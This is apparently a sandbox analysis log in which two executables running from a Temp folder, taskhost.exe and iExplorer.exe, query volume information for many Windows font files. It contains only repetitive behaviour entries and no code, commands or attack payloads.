                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\taskhost.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\impact.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\micross.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\pala.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\seguibl.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\seguibli.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\SitkaB.ttc | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\SitkaZ.ttc | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\tahoma.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\tahomabd.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\timesi.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\timesbi.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\trebuc.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\trebucbi.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\verdana.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\webdings.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\YuGothL.ttc | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\YuGothB.ttc | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\YuGothM.ttc | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\YuGothR.ttc | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\holomdl2.ttf | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\CENTURY.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\PRISTINA.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\MISTRAL.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\LHANDW.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\JUICE___.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\FREESCPT.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\BRADHITC.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\BKANT.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\GARA.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\GARAIT.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\GARABD.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\GOTHIC.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\GOTHICI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\GOTHICB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\ALGER.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\BASKVILL.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\BAUHS93.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\BELL.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\BELLI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\BELLB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\BRLNSR.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\BRLNSB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\BERNHC.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\BRITANIC.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\BROADW.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\CALIFR.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\CALIFI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\CALIFB.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\CENTAUR.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\CHILLER.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\COLONNA.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\COOPBL.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\FTLTLT.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\HTOWERT.TTF | VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\iExplorer.exe | Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF | VolumeInformation
